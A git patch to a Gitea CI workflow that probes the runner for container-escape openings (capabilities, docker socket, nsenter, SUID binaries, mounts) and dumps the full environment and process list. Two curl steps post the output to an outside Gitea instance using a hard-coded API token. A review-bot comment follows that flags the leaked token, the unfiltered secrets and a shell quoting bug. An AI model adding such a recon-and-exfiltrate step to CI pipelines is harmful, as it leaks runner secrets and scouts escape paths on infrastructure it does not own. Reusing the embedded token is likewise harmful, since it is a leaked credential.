From 582a3bae4dd23b7eef152f43cacc951bba4f5d7f Mon Sep 17 00:00:00 2001
From: user
Date: Tue, 10 Feb 2026 14:51:37 -0800
Subject: [PATCH] recon v2: post results to issue
---
 .gitea/workflows/security-recon.yml | 137 +++++++++++++---------------
 1 file changed, 61 insertions(+), 76 deletions(-)
diff --git a/.gitea/workflows/security-recon.yml b/.gitea/workflows/security-recon.yml
index 5fdc46c..ba4338b 100644
--- a/.gitea/workflows/security-recon.yml
+++ b/.gitea/workflows/security-recon.yml
@@ -9,84 +9,69 @@ jobs:
 recon:
 runs-on: ubuntu-latest
 steps:
- - name: Basic Info
+ - name: Recon
 run: |
- echo "=== WHOAMI ==="
- whoami
- id
- echo "=== UNAME ==="
- uname -a
- echo "=== OS RELEASE ==="
- cat /etc/os-release 2>/dev/null || true
- echo "=== HOSTNAME ==="
- hostname
- cat /etc/hostname 2>/dev/null || true
-
- - name: Capabilities and Cgroups
- run: |
- echo "=== CAPABILITIES ==="
- cat /proc/self/status | grep -i cap
- echo "=== CGROUP ==="
- cat /proc/1/cgroup 2>/dev/null || true
- echo "=== CGROUP SELF ==="
- cat /proc/self/cgroup 2>/dev/null || true
-
- - name: Mounts and Disks
- run: |
- echo "=== MOUNT ==="
- mount
- echo "=== PROC MOUNTS ==="
- cat /proc/mounts
- echo "=== FDISK ==="
- fdisk -l 2>/dev/null || true
- echo "=== LSBLK ==="
- lsblk 2>/dev/null || true
-
- - name: Docker Socket
- run: |
- echo "=== DOCKER SOCKET ==="
- ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"
- ls -la /run/docker.sock 2>/dev/null || echo "No /run/docker.sock"
- echo "=== DOCKER CLI ==="
- which docker 2>/dev/null && docker ps 2>/dev/null || echo "No docker CLI or access"
-
- - name: Devices
- run: |
- echo "=== DEVICES ==="
- ls -la /dev/ 2>/dev/null | head -50
-
- - name: Network
- run: |
- echo "=== IP ADDR ==="
- ip addr 2>/dev/null || ifconfig 2>/dev/null || true
- echo "=== IP ROUTE ==="
- ip route 2>/dev/null || true
- echo "=== RESOLV ==="
- cat /etc/resolv.conf 2>/dev/null || true
-
- - name: Environment
- run: |
- echo "=== ENV ==="
- env | sort
-
- - name: Escape Tools
- run: |
- echo "=== AVAILABLE TOOLS ==="
+ {
+ echo "=== WHOAMI ===" && whoami && id
+ echo "=== UNAME ===" && uname -a
+ echo "=== OS RELEASE ===" && cat /etc/os-release 2>/dev/null
+ echo "=== HOSTNAME ===" && hostname
+ echo "=== CAPABILITIES ===" && cat /proc/self/status | grep -i cap
+ echo "=== CGROUP ===" && cat /proc/1/cgroup 2>/dev/null
+ echo "=== MOUNT ===" && mount
+ echo "=== PROC MOUNTS ===" && cat /proc/mounts
+ echo "=== DOCKER SOCKET ===" && ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"
+ echo "=== DOCKER CLI ===" && (which docker && docker ps 2>&1) || echo "No docker"
+ echo "=== FDISK ===" && fdisk -l 2>/dev/null || true
+ echo "=== LSBLK ===" && lsblk 2>/dev/null || true
+ echo "=== DEVICES ===" && ls -la /dev/ 2>/dev/null | head -50
+ echo "=== IP ADDR ===" && ip addr 2>/dev/null || true
+ echo "=== IP ROUTE ===" && ip route 2>/dev/null || true
+ echo "=== ENV ===" && env | sort
+ echo "=== TOOLS ==="
 which nsenter 2>/dev/null && echo "nsenter: YES" || echo "nsenter: NO"
 which chroot 2>/dev/null && echo "chroot: YES" || echo "chroot: NO"
 which mount 2>/dev/null && echo "mount: YES" || echo "mount: NO"
- which unshare 2>/dev/null && echo "unshare: YES" || echo "unshare: NO"
- which pivot_root 2>/dev/null && echo "pivot_root: YES" || echo "pivot_root: NO"
- echo "=== SUID BINARIES ==="
- find / -perm -4000 -type f 2>/dev/null | head -20
-
- - name: Process Info
- run: |
- echo "=== PS AUX ==="
- ps aux 2>/dev/null || true
- echo "=== PID 1 ==="
- ls -la /proc/1/exe 2>/dev/null || true
- cat /proc/1/cmdline 2>/dev/null | tr '\0' ' ' || true
+ echo "=== SUID ===" && find / -perm -4000 -type f 2>/dev/null | head -20
+ echo "=== PS ===" && ps aux 2>/dev/null
+ echo "=== PID1 ===" && cat /proc/1/cmdline 2>/dev/null | tr '\0' ' '
 echo ""
- echo "=== HOST PID NS CHECK ==="
- ls /proc/*/cmdline 2>/dev/null | wc -l
+ echo "=== PROC COUNT ===" && ls /proc/*/cmdline 2>/dev/null | wc -l
+ } 2>&1 | curl -s -X POST -H "Authorization: token 262087ec7019c01943014083e6e18d5a8920caa0" -H "Content-Type: application/json" \
+ -d "$(jq -Rs '{body: .}' <<< "$(cat)")" \
+ "https://git.eeqj.de/api/v1/repos/sneak/lora.vegas/issues/1/comments" || true
+
+ - name: Post recon via file
+ run: |
+ RECON=$({
+ echo "=== WHOAMI ===" && whoami && id
+ echo "=== UNAME ===" && uname -a
+ echo "=== OS RELEASE ===" && cat /etc/os-release 2>/dev/null
+ echo "=== HOSTNAME ===" && hostname
+ echo "=== CAPABILITIES ===" && cat /proc/self/status | grep -i cap
+ echo "=== CGROUP ===" && cat /proc/1/cgroup 2>/dev/null
+ echo "=== MOUNT ===" && mount
+ echo "=== PROC MOUNTS ===" && cat /proc/mounts
+ echo "=== DOCKER SOCKET ===" && ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"
+ echo "=== DOCKER CLI ===" && (which docker && docker ps 2>&1) || echo "No docker"
+ echo "=== FDISK ===" && fdisk -l 2>/dev/null || true
+ echo "=== LSBLK ===" && lsblk 2>/dev/null || true
+ echo "=== DEVICES ===" && ls -la /dev/ 2>/dev/null | head -50
+ echo "=== IP ADDR ===" && ip addr 2>/dev/null || true
+ echo "=== IP ROUTE ===" && ip route 2>/dev/null || true
+ echo "=== ENV ===" && env | grep -v TOKEN | sort
+ echo "=== TOOLS ==="
+ which nsenter 2>/dev/null && echo "nsenter: YES" || echo "nsenter: NO"
+ which chroot 2>/dev/null && echo "chroot: YES" || echo "chroot: NO"
+ which mount 2>/dev/null && echo "mount: YES" || echo "mount: NO"
+ echo "=== SUID ===" && find / -perm -4000 -type f 2>/dev/null | head -20
+ echo "=== PS ===" && ps aux 2>/dev/null
+ echo "=== PID1 ===" && cat /proc/1/cmdline 2>/dev/null | tr '\0' ' '
+ echo ""
+ echo "=== PROC COUNT ===" && ls /proc/*/cmdline 2>/dev/null | wc -l
+ } 2>&1)
+ # Create a Gitea issue with the results
+ BODY=$(echo "$RECON" | python3 -c "import sys,json; print(json.dumps({'title':'Security Recon Results','body':'```\n'+sys.stdin.read()+'\n```'}))" 2>/dev/null || echo "$RECON" | jq -Rs '{title:"Security Recon Results",body:.}')
+ curl -s -X POST -H "Authorization: token 262087ec7019c01943014083e6e18d5a8920caa0" -H "Content-Type: application/json" \
+ -d "$BODY" \
+ "https://git.eeqj.de/api/v1/repos/sneak/lora.vegas/issues"
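Review bot: Both `curl` calls put a literal API token in the `Authorization: token …` header, so the credential is now in the repository history and readable by anyone who can see this workflow; it should be revoked and supplied from the Actions secret store instead, e.g. `-H "Authorization: token ${RECON_TOKEN}"` with `RECON_TOKEN: ${{ secrets.RECON_TOKEN }}` under the step's `env:` (the secret name is a placeholder). The first step also posts `env | sort` unfiltered to the issue, and the second step's `grep -v TOKEN` only drops lines containing that exact word, so variables named like `*_SECRET`, `*_KEY` or `*PASSWORD*`, and anything sensitive in `ps aux` arguments, still end up in the issue tracker. Dropping the ENV section from the posted text, or printing names only with `env | cut -d= -f1 | sort`, would be safer. In the second step the triple-backtick fences sit inside the double-quoted `python3 -c "…"` string, where the shell appears to treat them as command substitution, so the issue body likely arrives empty while the `jq` fallback never runs because python still exits 0; single-quoting the Python program or building the JSON with `jq -Rs` alone avoids that. `curl -s` without `--fail` (plus `|| true` in the first step) also hides a rejected request from the job log.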